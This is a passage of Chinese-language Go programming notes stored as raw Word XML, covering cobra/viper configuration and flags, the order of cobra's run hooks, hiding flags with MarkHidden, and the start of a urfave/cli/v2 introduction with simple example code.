      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D4835D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">func initConfig() </w:t>
      </w:r>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC03E75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if cfgFile != "" {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C28E6C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// Use config file from the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6829EC5B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>viper.SetConfigFile(cfgFile)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5D4244" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C3F110" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// Find home directory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F03BBCA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>home, err := os.UserHomeDir()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D483170" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>cobra.CheckErr(err)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="659D75AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64B8151C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>// Search config in home directory with name ".cobra" (without extension).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050EB3E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>viper.AddConfigPath(home)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201891DE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>viper.SetConfigType("yaml")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A0A92B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>viper.SetConfigName(".cobra")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5386C750" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74992917" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32CA602D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>viper.AutomaticEnv()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D86BE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41B03052" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>if err := viper.ReadInConfig(); err == nil {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3A847F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>fmt.Println("Using config file:", viper.ConfigFileUsed())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F9B349" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605FC55E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55239CC9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5242AB9A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>rootCmd.PersistentFlags().StringVar(&amp;cfgFile, "config", "", "config file (default is $HOME/.cobra.yaml)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BE11F4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>rootCmd.PersistentFlags().StringP("author", "a", "YOUR NAME", "author name for copyright attribution")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C3A3C5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>rootCmd.PersistentFlags().StringVarP(&amp;userLicense, "license", "l", "", "name of license for the project")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6E8625" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>rootCmd.PersistentFlags().Bool("viper", true, "use Viper for configuration")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171D2185" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>viper.BindPFlag("author", rootCmd.PersistentFlags().Lookup("author"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539BAA41" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>viper.BindPFlag("useViper", rootCmd.PersistentFlags().Lookup("viper"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DF6FA2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>viper.SetDefault("author", "NAME HERE &lt;EMAIL ADDRESS&gt;")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CA6288" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>viper.SetDefault("license", "apache")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A32DC96" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C4556E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>rootCmd.AddCommand(addCmd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2307A0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>rootCmd.AddCommand(initCmd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E851B4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0093324C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>xxxCmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结构体方法执行顺序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FD4129" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PersistentPreRun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B99A88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PreRun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326A5A8A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35203D6B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PostRun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E1112E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PersistentPostRun</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455CED59" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190A4ECB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>隐藏某个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cobra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令的提示信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7D84F5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rootCmd.PersistentFlags().StringP("config", "", "", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59628238" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MarkHidden()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数来表示某个信息的隐藏</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332A88AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rootCmd.PersistentFlags().</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>MarkHidden("config")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C9D84C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="377B9CB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C383922" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="361" w:name="_Toc159779817"/>
      <w:r>
        <w:t>github.com/urfave/cli</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/v2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中构建命令行应用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="361"/>
    </w:p>
    <w:p w14:paraId="33F48241" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4635B43B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(github</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上的使用方法不多</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>):  https://github.com/urfave/cli</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15501341" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>教程：</w:t>
      </w:r>
      <w:r>
        <w:t>https://cli.urfave.org/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本，建议阅读</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>v2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF5398" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>https://cli.urfave.org/v2/getting-started/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D36C3C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>doc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>教程：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>https://github.com/urfave/cli/tree/main/docs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4901E07E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680E1FE2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个库的设计意义接近于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cobra</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用来处理命令行参数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EA0057" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1BB7EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单示例：运行后会显示帮助文档</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6B493A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E50469" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50E6F321" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470A21AA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "os"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABA4714" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"github.com/urfave/cli/v2"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0745BFAF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D741E4" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72078CD6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func main() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B2D2BF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(&amp;cli.App{}).Run(os.Args)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354BBD88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B2E392" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD137B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体" w:cs="黑体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>添加命令行相关的动作后：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37538C53" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B3B1702" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EE6CCF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D12D2D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>import (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BEC102" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "fmt"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FF4345" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "log"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C463DD" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    "os"</w:t>
      </w:r>
    </w:p>
